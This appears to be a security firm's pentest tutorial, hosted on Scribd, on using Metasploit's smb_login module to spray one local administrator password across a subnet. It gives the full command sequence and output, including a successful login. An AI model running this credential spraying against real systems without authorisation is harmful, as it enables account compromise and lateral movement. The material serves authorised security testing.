Scribd Logo
Upload

Welcome to Scribd!

  • 42 views

    Testing Windows Passwords With Metasploit

    Uploaded by

    Redspin, Inc.
    An attacker will take the path of least resistance in order to gain access to critical systems and data. During a pen test we'll take the same tactic as well.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    Testing Windows Passwords With Metasploit

    Uploaded by

    Redspin, Inc.
    42 views2 pages
    An attacker will take the path of least resistance in order to gain access to critical systems and data. During a pen test we'll take the same tactic as well.

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    An attacker will take the path of least resistance in order to gain access to critical systems and data. During a pen test we'll take the same tactic as well.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    42 views2 pages

    Testing Windows Passwords With Metasploit

    Uploaded by

    Redspin, Inc.
    An attacker will take the path of least resistance in order to gain access to critical systems and data. During a pen test we'll take the same tactic as well.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 2

    Testing Windows Passwords with Metasploit

    An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test well take the same tactic as well. Frequently this is accomplished by guessing a password to a users account and then either using the privileges of that account to gain access to critical data or escalating that account to an administrator or root level account. Once credentials have been acquired for one host youll want to determine what other systems they work against. It is fairly common to gain access to a local administrator account on a workstation or server for example, but not a domain account and in this case you will want to try that local administrator account against a whole slew of other systems. There are a number of ways to accomplish this task but one of the most efficient ways is using the smb_login module of Metasploit Framework 4 (http://www.metasploit.com/) to test a single username/password combination against a lot of boxes very quickly.
    msf > use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) > set smbpass Password! smbpass => Password! msf auxiliary(smb_login) > set smbuser administrator smbuser => administrator msf auxiliary(smb_login) > set user_as_pass false user_as_pass => false msf auxiliary(smb_login) > set rhosts 10.0.0.100-110 rhosts => 10.0.0.100-110 msf auxiliary(smb_login) > show options Module options (auxiliary/scanner/smb/smb_login):

    Name ---BLANK_PASSWORDS BRUTEFORCE_SPEED PASS_FILE PRESERVE_DOMAINS RHOSTS RPORT SMBDomain SMBPass SMBUser STOP_ON_SUCCESS THREADS USERPASS_FILE

    Current Setting --------------true 5 true 10.0.0.100-110 445 WORKGROUP Password! administrator false 1

    Required -------no yes no no yes yes no no no yes yes no no no yes

    USER_AS_PASS true USER_FILE VERBOSE true msf auxiliary(smb_login) > exploit

    Description ----------Try blank passwords for all users How fast to bruteforce, from 0 to 5 File containing passwords, one per line Respect a username that contains a domain name. The target address range or CIDR identifier Set the SMB service port SMB Domain SMB Password SMB Username Stop guessing when a credential works for a host The number of concurrent threads File containing users and passwords separated by space, one pair per line Try the username as the password for all users File containing usernames, one per line Whether to print output for all attempts

    [*] 10.0.0.100:445 SMB - Starting SMB login bruteforce [*] 10.0.0.101:445 SMB - Starting SMB login bruteforce [*] Scanned 02 of 11 hosts (018% complete) [*] 10.0.0.102:445 SMB - Starting SMB login bruteforce [*] Scanned 03 of 11 hosts (027% complete) [*] 10.0.0.103:445 SMB - [1/2] - Starting SMB login bruteforce [*] Scanned 04 of 11 hosts (036% complete) [*] 10.0.0.104:445 SMB - [1/2] - Starting SMB login bruteforce [*] Scanned 05 of 11 hosts (045% complete) [*] 10.0.0.105:445 SMB - [1/2] - Starting SMB login bruteforce [*] Scanned 06 of 11 hosts (054% complete) [*] 10.0.0.106:445 SMB - [1/2] - Starting SMB login bruteforce [*] Scanned 07 of 11 hosts (063% complete) [*] 10.0.0.107:445 SMB - [1/2] - Starting SMB login bruteforce [*] 10.0.0.107:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator : (STATUS_LOGON_FAILURE) [+] 10.0.0.107:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!' [*] Scanned 08 of 11 hosts (072% complete) [*] 10.0.0.108:445 SMB - [1/2] - Starting SMB login bruteforce [*] Scanned 09 of 11 hosts (081% complete) [*] 10.0.0.109:445 SMB - [1/2] - Starting SMB login bruteforce [*] Scanned 10 of 11 hosts (090% complete) [*] 10.0.0.110:445 SMB - [1/2] - Starting SMB login bruteforce [*] Scanned 11 of 11 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(smb_login) >

    In this example I successfully compromised one of my test systems that was using the password Password! for the local administrator account. This may seem farfetched, but Ive seen worse than this before on engagements. Be aware that this type of activity is very noisy and easily detectable by a sysadmin or security goon, as it will create a failed login attempt for the Administrator account on every machine in the subnet.

    WEB
    WWW.REDSPIN.COM

    PHONE
    800-721-9177

    EMAIL
    INFO@REDSPIN.COM

    You might also like